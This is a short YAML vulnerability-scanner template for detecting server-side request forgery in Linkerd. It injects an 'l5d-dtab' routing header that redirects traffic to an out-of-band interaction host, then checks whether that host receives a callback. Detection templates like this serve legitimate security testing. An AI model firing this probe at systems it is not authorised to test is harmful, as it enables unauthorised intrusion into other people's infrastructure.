id: linkerd-ssrf-detection

info:
  name: Linkerd SSRF detection
  author: dudez
  severity: high
  description: Linkerd is vulnerable to SSRF.
  reference:
    - https://twitter.com/nirvana_msu/status/1084144955034165248
  metadata:
    max-request: 1
  tags: ssrf,linkerd,oast,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100a4c4a54627ac1c86404e929f166888f3e968a0e518363f281e473a1042418ff402200db8875e1d26514ab765930e390227ecc894e6e6df4f85b96f1cad6f42d46b4c:922c64590222798bb761d5b6d8e72950